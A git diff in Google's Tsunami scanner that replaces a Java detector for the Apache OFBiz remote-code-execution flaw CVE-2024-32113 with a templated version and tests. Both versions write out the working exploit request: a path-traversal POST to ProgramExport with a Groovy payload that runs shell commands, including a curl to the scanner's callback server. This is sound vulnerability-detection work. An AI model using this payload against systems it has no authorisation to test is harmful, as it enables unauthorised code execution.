diff --git a/google/README.md b/google/README.md index f9493cf98..3412a721c 100644 --- a/google/README.md +++ b/google/README.md @@ -43,6 +43,7 @@ This directory contains all Tsunami plugins published by Google. * [Apache Solr VelocityResponseWriter RCE (CVE-2019-17558) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/solr_cve201917558) * [Tomcat Ghostcat (CVE-2020-1938) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/tomcat/ghostcat) * [vBulletin Pre-Auth RCE (CVE-2019-16759) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/vbulletin/cve201916759) +* [Apache OFBiz RCE (CVE-2024-32113) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto) ## Planned Detectors diff --git a/google/detectors/rce/cve202432113/README.md b/google/detectors/rce/cve202432113/README.md deleted file mode 100644 index 92c4626ed..000000000 --- a/google/detectors/rce/cve202432113/README.md +++ /dev/null @@ -1,15 +0,0 @@ -# CVE-2024-32113 Detector - -This detector identifies instances of Apache OFBiz which are vulnerable to -CVE-2024-32113. This vulnerability is present in APache OFBiz berfore version -18.12.13. - -## Build jar file for this plugin - -Using `gradlew`: - -```shell -./gradlew jar -``` - -Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/google/detectors/rce/cve202432113/build.gradle b/google/detectors/rce/cve202432113/build.gradle deleted file mode 100644 index f56bc4033..000000000 --- a/google/detectors/rce/cve202432113/build.gradle +++ /dev/null @@ -1,39 +0,0 @@ -plugins { - id 'java-library' -} - -description = 'Apache OFBiz CVE-2024-32113 detector for Tsunami.' -group = 'com.google.tsunami' -version = '0.0.1-SNAPSHOT' - -repositories { - maven { // The google mirror is less flaky than mavenCentral() - url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' - } - mavenCentral() - mavenLocal() -} - - - -def coreRepoBranch = System.getenv("GITBRANCH_TSUNAMI_CORE") ?: "stable" -def tcsRepoBranch = System.getenv("GITBRANCH_TSUNAMI_TCS") ?: "stable" - -dependencies { - implementation("com.google.tsunami:tsunami-common") { - version { branch = "${coreRepoBranch}" } - } - implementation("com.google.tsunami:tsunami-plugin") { - version { branch = "${coreRepoBranch}" } - } - implementation("com.google.tsunami:tsunami-proto") { - version { branch = "${coreRepoBranch}" } - } - - testImplementation "junit:junit:4.13.2" - testImplementation "com.squareup.okhttp3:mockwebserver:3.12.0" - testImplementation "org.mockito:mockito-core:5.18.0" - testImplementation "com.google.truth:truth:1.4.4" - testImplementation "com.google.truth.extensions:truth-java8-extension:1.4.4" - testImplementation "com.google.truth.extensions:truth-proto-extension:1.4.4" -} diff --git a/google/detectors/rce/cve202432113/settings.gradle b/google/detectors/rce/cve202432113/settings.gradle deleted file mode 100644 index d1a865b4d..000000000 --- a/google/detectors/rce/cve202432113/settings.gradle +++ /dev/null @@ -1,12 +0,0 @@ -rootProject.name = 'ApacheOFBiz_CVE_2024_32113_Detector' - -def coreRepository = System.getenv("GITREPO_TSUNAMI_CORE") ?: "https://github.com/google/tsunami-security-scanner.git" -def tcsRepository = System.getenv("GITREPO_TSUNAMI_TCS") ?: "https://github.com/google/tsunami-security-scanner-callback-server.git" - -sourceControl { - gitRepository("${coreRepository}") { - producesModule("com.google.tsunami:tsunami-common") - producesModule("com.google.tsunami:tsunami-plugin") - producesModule("com.google.tsunami:tsunami-proto") - } -} diff --git a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113Detector.java b/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113Detector.java deleted file mode 100644 index e6a93c53f..000000000 --- a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113Detector.java +++ /dev/null @@ -1,172 +0,0 @@ -/* - * Copyright 2025 Google LLC - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.google.tsunami.plugins.detectors.rce.cve202432113; - -import static com.google.common.base.Preconditions.checkNotNull; -import static com.google.common.collect.ImmutableList.toImmutableList; -import static java.nio.charset.StandardCharsets.UTF_8; - -import com.google.common.annotations.VisibleForTesting; -import com.google.common.collect.ImmutableList; -import com.google.common.flogger.GoogleLogger; -import com.google.protobuf.ByteString; -import com.google.protobuf.util.Timestamps; -import com.google.tsunami.common.data.NetworkServiceUtils; -import com.google.tsunami.common.net.http.HttpClient; -import com.google.tsunami.common.net.http.HttpHeaders; -import com.google.tsunami.common.net.http.HttpRequest; -import com.google.tsunami.common.net.http.HttpResponse; -import com.google.tsunami.common.time.UtcClock; -import com.google.tsunami.plugin.PluginType; -import com.google.tsunami.plugin.VulnDetector; -import com.google.tsunami.plugin.annotations.ForWebService; -import com.google.tsunami.plugin.annotations.PluginInfo; -import com.google.tsunami.plugin.payload.Payload; -import com.google.tsunami.plugin.payload.PayloadGenerator; -import com.google.tsunami.proto.DetectionReport; -import com.google.tsunami.proto.DetectionReportList; -import com.google.tsunami.proto.DetectionStatus; -import com.google.tsunami.proto.NetworkService; -import com.google.tsunami.proto.PayloadGeneratorConfig; -import com.google.tsunami.proto.Severity; -import com.google.tsunami.proto.TargetInfo; -import com.google.tsunami.proto.Vulnerability; -import com.google.tsunami.proto.VulnerabilityId; -import java.io.IOException; -import java.net.URLEncoder; -import java.time.Clock; -import javax.inject.Inject; - -/** Tsunami plugin for Apache OFBiz CVE-2024-32113. */ -@ForWebService -@PluginInfo( - type = PluginType.VULN_DETECTION, - name = "Apache OFBiz CVE-2024-32113 Detector", - version = "0.1", - description = "This plugin detects Apache OFBiz instances vulnerable to CVE-2024-32113.", - author = "Ryan Beltran (ryanbeltran@google.com)", - bootstrapModule = Cve202432113DetectorBootstrapModule.class) -public final class Cve202432113Detector implements VulnDetector { - private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); - - private final Clock utcClock; - private final HttpClient httpClient; - private final PayloadGenerator payloadGenerator; - - @Inject - Cve202432113Detector( - @UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) { - this.utcClock = checkNotNull(utcClock); - this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(false).build(); - this.payloadGenerator = checkNotNull(payloadGenerator); - } - - @Override - public ImmutableList getAdvisories() { - return ImmutableList.of( - Vulnerability.newBuilder() - .setMainId( - VulnerabilityId.newBuilder() - .setPublisher(VULNERABILITY_REPORT_PUBLISHER) - .setValue(VULNERABILITY_REPORT_ID)) - .addRelatedId( - VulnerabilityId.newBuilder().setPublisher("CVE").setValue(VULNERABILITY_REPORT_ID)) - .setSeverity(Severity.CRITICAL) - .setTitle(VULNERABILITY_REPORT_TITLE) - .setDescription(VULNERABILITY_REPORT_DESCRIPTION) - .setRecommendation(VULNERABILITY_REPORT_RECOMMENDATION) - .build()); - } - - @Override - public DetectionReportList detect( - TargetInfo targetInfo, ImmutableList matchedServices) { - logger.atInfo().log("Apache OFBiz CVE-2024-32113 Detector starts detecting."); - - return DetectionReportList.newBuilder() - .addAllDetectionReports( - matchedServices.stream() - .filter(this::isServiceVulnerable) - .map(networkService -> buildDetectionReport(targetInfo, networkService)) - .collect(toImmutableList())) - .build(); - } - - private boolean isServiceVulnerable(NetworkService networkService) { - String rootUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService); - String targetUri = rootUri + "webtools/control/forgotPassword/foo/../ProgramExport"; - - Payload payload = - payloadGenerator.generate( - PayloadGeneratorConfig.newBuilder() - .setInterpretationEnvironment( - PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL) - .setExecutionEnvironment( - PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT) - .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE) - .build()); - - String encodedGroovyProgram = - URLEncoder.encode( - "throw new Exception('" + payload.getPayload() + "'.execute().text);", UTF_8); - - try { - HttpRequest req = - HttpRequest.post(targetUri) - .setHeaders( - HttpHeaders.builder() - .addHeader("Content-Type", "application/x-www-form-urlencoded") - .build()) - .setRequestBody(ByteString.copyFromUtf8("groovyProgram=" + encodedGroovyProgram)) - .build(); - HttpResponse res = httpClient.send(req, networkService); - return payload.checkIfExecuted(res.bodyBytes()); - - } catch (IOException e) { - logger.atWarning().withCause(e).log( - "Failed to exploit '%s'. Maybe it is not vulnerable", targetUri); - return false; - } - } - - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; - - @VisibleForTesting - static final String VULNERABILITY_REPORT_TITLE = - "CVE-2024-32113 Remote code execution vulnerability in Apache OFBiz"; - - @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CVE-2024-32113"; - - @VisibleForTesting - static final String VULNERABILITY_REPORT_DESCRIPTION = - "The scanner detected that attackers can execute arbitrary code on the server via restricted" - + " endpoints without authorization"; - - @VisibleForTesting - static final String VULNERABILITY_REPORT_RECOMMENDATION = - "Upgrade to Apache OFBiz patched version 18.12.13."; - - private DetectionReport buildDetectionReport( - TargetInfo targetInfo, NetworkService vulnerableNetworkService) { - return DetectionReport.newBuilder() - .setTargetInfo(targetInfo) - .setNetworkService(vulnerableNetworkService) - .setDetectionTimestamp(Timestamps.fromMillis(utcClock.instant().toEpochMilli())) - .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) - .setVulnerability(this.getAdvisories().get(0)) - .build(); - } -} diff --git a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorBootstrapModule.java b/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorBootstrapModule.java deleted file mode 100644 index 6f7e29b09..000000000 --- a/google/detectors/rce/cve202432113/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorBootstrapModule.java +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright 2025 Google LLC - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.google.tsunami.plugins.detectors.rce.cve202432113; - -import com.google.tsunami.plugin.PluginBootstrapModule; - -/** An example Guice module that bootstraps the {@link ExampleVulnDetector}. */ -public final class Cve202432113DetectorBootstrapModule extends PluginBootstrapModule { - - @Override - protected void configurePlugin() { - // Tsunami relies heavily on Guice (https://github.com/google/guice). All Guice bindings for - // your plugin should be implemented here. - - // registerPlugin method is required in order for the Tsunami scanner to identify your plugin. - registerPlugin(Cve202432113Detector.class); - } -} diff --git a/google/detectors/rce/cve202432113/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorTest.java b/google/detectors/rce/cve202432113/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorTest.java deleted file mode 100644 index e83c38935..000000000 --- a/google/detectors/rce/cve202432113/src/test/java/com/google/tsunami/plugins/detectors/rce/cve202432113/Cve202432113DetectorTest.java +++ /dev/null @@ -1,158 +0,0 @@ -/* - * Copyright 2025 Google LLC - * - * Licensed under the Apache License, Version 2.0 (the "License"); - * you may not use this file except in compliance with the License. - * You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.google.tsunami.plugins.detectors.rce.cve202432113; - -import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; -import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; -import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_DESCRIPTION; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_ID; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_PUBLISHER; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_RECOMMENDATION; -import static com.google.tsunami.plugins.detectors.rce.cve202432113.Cve202432113Detector.VULNERABILITY_REPORT_TITLE; - -import com.google.common.collect.ImmutableList; -import com.google.inject.Guice; -import com.google.protobuf.util.Timestamps; -import com.google.tsunami.common.net.http.HttpClientModule; -import com.google.tsunami.common.net.http.HttpStatus; -import com.google.tsunami.common.time.testing.FakeUtcClock; -import com.google.tsunami.common.time.testing.FakeUtcClockModule; -import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; -import com.google.tsunami.proto.DetectionReport; -import com.google.tsunami.proto.DetectionReportList; -import com.google.tsunami.proto.DetectionStatus; -import com.google.tsunami.proto.NetworkService; -import com.google.tsunami.proto.Severity; -import com.google.tsunami.proto.TargetInfo; -import com.google.tsunami.proto.TransportProtocol; -import com.google.tsunami.proto.Vulnerability; -import com.google.tsunami.proto.VulnerabilityId; -import java.io.IOException; -import java.security.SecureRandom; -import java.time.Instant; -import java.util.Arrays; -import javax.inject.Inject; -import okhttp3.mockwebserver.MockResponse; -import okhttp3.mockwebserver.MockWebServer; -import org.junit.Before; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.junit.runners.JUnit4; - -@RunWith(JUnit4.class) -public final class Cve202432113DetectorTest { - private final FakeUtcClock fakeUtcClock = - FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); - - @Inject private Cve202432113Detector detector; - - private final MockWebServer mockOfBizServer = new MockWebServer(); - - private final SecureRandom testSecureRandom = - new SecureRandom() { - @Override - public void nextBytes(byte[] bytes) { - Arrays.fill(bytes, (byte) 0xFF); - } - }; - - private static final String VULNERABLE_BODY = - """ -
-

The Following Errors Occurred:

-

java.lang.Exception: TSUNAMI_PAYLOAD_STARTffffffffffffffffTSUNAMI_PAYLOAD_END

-
-"""; - - @Before - public void setUp() throws IOException { - mockOfBizServer.start(); - - Guice.createInjector( - new FakeUtcClockModule(fakeUtcClock), - new HttpClientModule.Builder().build(), - FakePayloadGeneratorModule.builder().setSecureRng(testSecureRandom).build(), - new Cve202432113DetectorBootstrapModule()) - .injectMembers(this); - } - - NetworkService createNetworkService(MockWebServer mockService) { - return NetworkService.newBuilder() - .setNetworkEndpoint(forHostnameAndPort(mockService.getHostName(), mockService.getPort())) - .setTransportProtocol(TransportProtocol.TCP) - .setServiceName("http") - .build(); - } - - @Test - public void detect_whenVulnerable_reportsVulnerability() throws IOException { - NetworkService service = createNetworkService(mockOfBizServer); - mockOfBizServer.enqueue( - new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(VULNERABLE_BODY)); - - TargetInfo target = - TargetInfo.newBuilder() - .addNetworkEndpoints(forHostname(mockOfBizServer.getHostName())) - .build(); - - DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service)); - - assertThat(detectionReports.getDetectionReportsList()) - .containsExactly(buildValidDetectionReport(target, service, fakeUtcClock)); - } - - @Test - public void detect_whenNotVulnerable_reportsEmpty() throws IOException { - NetworkService service = createNetworkService(mockOfBizServer); - String body = "hello world"; - mockOfBizServer.enqueue(new MockResponse().setResponseCode(HttpStatus.OK.code()).setBody(body)); - - TargetInfo target = - TargetInfo.newBuilder() - .addNetworkEndpoints(forHostname(mockOfBizServer.getHostName())) - .build(); - - DetectionReportList detectionReports = detector.detect(target, ImmutableList.of(service)); - - assertThat(detectionReports.getDetectionReportsList()).isEmpty(); - } - - DetectionReport buildValidDetectionReport( - TargetInfo target, NetworkService service, FakeUtcClock fakeUtcClock) { - - return DetectionReport.newBuilder() - .setTargetInfo(target) - .setNetworkService(service) - .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) - .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) - .setVulnerability( - Vulnerability.newBuilder() - .setMainId( - VulnerabilityId.newBuilder() - .setPublisher(VULNERABILITY_REPORT_PUBLISHER) - .setValue(VULNERABILITY_REPORT_ID)) - .addRelatedId( - VulnerabilityId.newBuilder() - .setPublisher("CVE") - .setValue(VULNERABILITY_REPORT_ID)) - .setSeverity(Severity.CRITICAL) - .setTitle(VULNERABILITY_REPORT_TITLE) - .setDescription(VULNERABILITY_REPORT_DESCRIPTION) - .setRecommendation(VULNERABILITY_REPORT_RECOMMENDATION)) - .build(); - } -} diff --git a/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto new file mode 100644 index 000000000..7ce7bb3a6 --- /dev/null +++ b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113.textproto @@ -0,0 +1,121 @@ +# proto-file: proto/templated_plugin.proto +# proto-message: TemplatedPlugin + +############### +# PLUGIN INFO # +############### + +info: { + type: VULN_DETECTION + name: "ApacheOfbiz_CVE_2024_32113" + author: + "Robert Dick (robert@doyensec.com) for templated version, " + "Ryan Beltran (ryanbeltran@google.com) for original Java version" + version: "2.0" +} + +finding: { + main_id: { + publisher: "GOOGLE" + value: "CVE_2024_32113" + } + severity: CRITICAL + title: "CVE-2024-32113 Remote code execution vulnerability in Apache OFBiz" + description: + "The scanner detected that attackers can execute arbitrary code on the server via restricted" + " endpoints without authorization" + recommendation: + "Upgrade to Apache OFBiz patched version 18.12.13." + related_id: { + publisher: "CVE" + value: "CVE-2024-32113" + } +} + +########### +# ACTIONS # +########### + +# original didn't have this but we include it just in case to reduce false positives + +actions: { + name: "fingerprint_ofbiz" + http_request: { + method: GET + uri: "/webtools/control/main" + response: { + expect_all: { + conditions: [ + { body: {} contains: "OFBiz" } + ] + } + } + } +} + +actions: { + name: "execute_payload" + http_request: { + method: POST + uri: "/webtools/control/forgotPassword/foo/../ProgramExport" + headers: [ + { name: "Content-Type" value: "application/x-www-form-urlencoded" } + ] + data: + 'groovyProgram=throw%20new%20Exception%28%27curl%20{{ T_CBS_URI }}%27.execute%28%29.text%29%3b' + } +} + +actions: { + name: "sleep" + utility: { sleep: { duration_ms: 1000 } } +} + +actions: { + name: "check_callback_server_logs" + callback_server: { action_type: CHECK } +} + +# reflective one for if the callback server is disabled + +actions: { + name: "execute_payload_reflective" + http_request: { + method: POST + uri: "/webtools/control/forgotPassword/foo/../ProgramExport" + headers: [ + { name: "Content-Type" value: "application/x-www-form-urlencoded" } + ] + data: + 'groovyProgram=throw%20new%20Exception%28%27printf%20%25x%20133713371337%27.execute%28%29.text%29%3b' + response: { + http_status: 200 + expect_all: { + conditions: [ + { body: {} contains: "1f21f020c9" } + ] + } + } + } +} + +############# +# WORKFLOWS # +############# + +workflows: { + condition: REQUIRES_CALLBACK_SERVER + actions: [ + "fingerprint_ofbiz", + "execute_payload", + "sleep", + "check_callback_server_logs" + ] +} + +workflows: { + actions: [ + "fingerprint_ofbiz", + "execute_payload_reflective" + ] +} diff --git a/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113_test.textproto b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113_test.textproto new file mode 100644 index 000000000..49453e3c5 --- /dev/null +++ b/templated/templateddetector/plugins/cve/2024/ApacheOfbiz_CVE_2024_32113_test.textproto @@ -0,0 +1,129 @@ +# proto-file: proto/templated_plugin_tests.proto +# proto-message: TemplatedPluginTests + +config: { + tested_plugin: "ApacheOfbiz_CVE_2024_32113" +} + +# Note: even though the request includes path traversal characters, +# the tests seem to normalize the path in the request. Therefore, +# we have to make listeners on the normalized path instead of the +# one containing path traversal characters. + +tests: { + name: "whenOobVulnerable_returnsVuln" + expect_vulnerability: true + + mock_callback_server: { + enabled: true + has_interaction: true + } + + mock_http_server: { + mock_responses: [ + { + uri: "/webtools/control/main" + status: 200 + body_content: + '... OFBiz: Web Tools: Web Tools Main Page ...' + }, + { + uri: "/webtools/control/forgotPassword/ProgramExport" + status: 200 + body_content: + '...' + } + ] + } +} + + +tests: { + name: "whenOobNotVulnerable_returnsNotVuln" + expect_vulnerability: false + + mock_callback_server: { + enabled: true + has_interaction: false + } + + mock_http_server: { + mock_responses: [ + { + uri: "/webtools/control/main" + status: 200 + body_content: + '... OFBiz: Web Tools: Web Tools Main Page ...' + }, + { + uri: "/webtools/control/forgotPassword/ProgramExport" + status: 200 + body_content: + '...' + } + ] + } +} + +# non-callback tests + +tests: { + name: "whenReflectiveVulnerable_returnsVuln" + expect_vulnerability: true + + mock_http_server: { + mock_responses: [ + { + uri: "/webtools/control/main" + status: 200 + body_content: + '... OFBiz: Web Tools: Web Tools Main Page ...' + }, + { + uri: "/webtools/control/forgotPassword/ProgramExport" + status: 200 + body_content: + '... 1f21f020c9 ...' + } + ] + } +} + +tests: { + name: "whenReflectiveNotVulnerable_returnsNotVuln" + expect_vulnerability: false + + mock_http_server: { + mock_responses: [ + { + uri: "/webtools/control/main" + status: 200 + body_content: + '... OFBiz: Web Tools: Web Tools Main Page ...' + }, + { + uri: "/webtools/control/forgotPassword/ProgramExport" + status: 200 + body_content: + '... 133713371337 ...' + } + ] + } +} + +tests: { + name: "whenRandomServer_returnsFalse" + expect_vulnerability: false + + + mock_http_server: { + mock_responses: [ + { + uri: "TSUNAMI_MAGIC_ANY_URI" + status: 200 + body_content: "Hello world" + } + ] + } +} +